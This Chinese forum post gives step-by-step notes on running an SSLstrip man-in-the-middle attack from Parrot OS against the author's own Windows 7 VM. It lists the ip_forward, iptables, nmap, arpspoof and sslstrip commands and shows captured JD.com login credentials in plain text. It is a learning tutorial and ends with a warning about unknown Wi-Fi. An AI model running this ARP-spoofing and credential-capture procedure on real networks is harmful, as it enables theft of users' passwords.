簡單說說利用parrot進(jìn)行SSLstrip
0x00前記
今天看了個(gè)視頻,學(xué)習(xí)到了如何進(jìn)行 SSLstrip.我們ParrotSec作為一個(gè)滲透測試系統(tǒng),在論壇里竟然沒有看到這個(gè)的教程,我就來補(bǔ)一個(gè)缺,順便作為學(xué)習(xí)筆記.由于剛剛學(xué)會(huì),只知道如何操作,不懂原理.如果有知道的大神可以在評論區(qū)為大家補(bǔ)充.
在這里我演示會(huì)使用到 ParrotSec和虛擬機(jī) Windows7.
0x01介紹
我們的目標(biāo)是嘗試訪問使用 https 網(wǎng)站的用戶. 路由器(網(wǎng)關(guān))會(huì)把受害者的訪問請求發(fā)送給我們,而攻擊者會(huì)把 https 轉(zhuǎn)換成 http 協(xié)議,然后扣下報(bào)文中的 用戶名和 密碼. 攻擊者會(huì)把請求報(bào)文發(fā)回給路由器(網(wǎng)關(guān)). 然后路由器會(huì)把這個(gè)新的請求發(fā)送給網(wǎng)站,這就是大概的攻擊機(jī)制.
----以上來自視頻字幕
0x02具體步驟
實(shí)施攻擊的時(shí)候我們需要和目標(biāo)機(jī)在同一局域網(wǎng),也需要獲取到目標(biāo)主機(jī)的ip地址.
首先我們需要打開終端,輸入 ifconfig 來查看我們的網(wǎng)卡
ifconfig

eth0代表有線網(wǎng)卡,wlan0代表無線網(wǎng)卡. 我使用到的是WiFi無線連接,所以查看wlan0這里,記住自己的ip地址后面需要使用.
接下來我們需要輸入一條命令
echo 1 > /proc/sys/net/ipv4/ip_forward
這條命令具體什么意思我也不是很清楚,好像是把輸出重定向到ip_forward這個(gè)文件

他這里顯示Permission denied(拒絕訪問),我們進(jìn)入root用戶,再執(zhí)行一次,成功了.
接下來配置路由表(iptables),把80端口的數(shù)據(jù)傳送到8080端口,也就是SSL欺騙需要監(jiān)聽的端口
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
現(xiàn)在我們需要找到網(wǎng)關(guān)的IP地址,輸入 route -n, GateWay 顯示的就是網(wǎng)關(guān)地址了

這里是192.168.1.1,這個(gè)要記下來
現(xiàn)在使用nmap獲取目標(biāo)主機(jī)的地址,在終端輸入
nmap -sS -O

我也不知道為什么好像只查到了網(wǎng)關(guān)的ip,而目標(biāo)機(jī)的ip沒有nmap出來, 請大佬指教
現(xiàn)在作個(gè)小小的弊,直接在目標(biāo)機(jī)上查到了ip,為192.168.1.100 (⊙﹏⊙)b
接下來我們進(jìn)行欺騙
arpspoof -i [網(wǎng)卡] -t [目標(biāo)ip] [網(wǎng)關(guān)ip]
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1

然后新開一個(gè)終端開始監(jiān)聽
sslstrip -l 8080

好這樣就準(zhǔn)備完成了,只需要等待目標(biāo)機(jī)進(jìn)行登錄操作我們就可以截取到報(bào)文
現(xiàn)在我們做一個(gè)測試,用目標(biāo)機(jī)打開jd,可以看到 https變成了 http

我們嘗試著輸入賬戶密碼, 登錄成功


打開終端,輸入cat sslstrip.log
cat sslstrip.log

可以看到報(bào)文最后一條是jd的,里面明文顯示這我的賬號和密碼.
所以 成功了 就這樣
0x03后記
其實(shí)大家生活中要注意一點(diǎn)不要隨意連接不明WiFi,賬戶密碼很容易泄露. 我還測試了一下taobao的密碼是加密的,jd沒有加密就這樣明文發(fā)送
小小萌新露個(gè)臉,大佬輕噴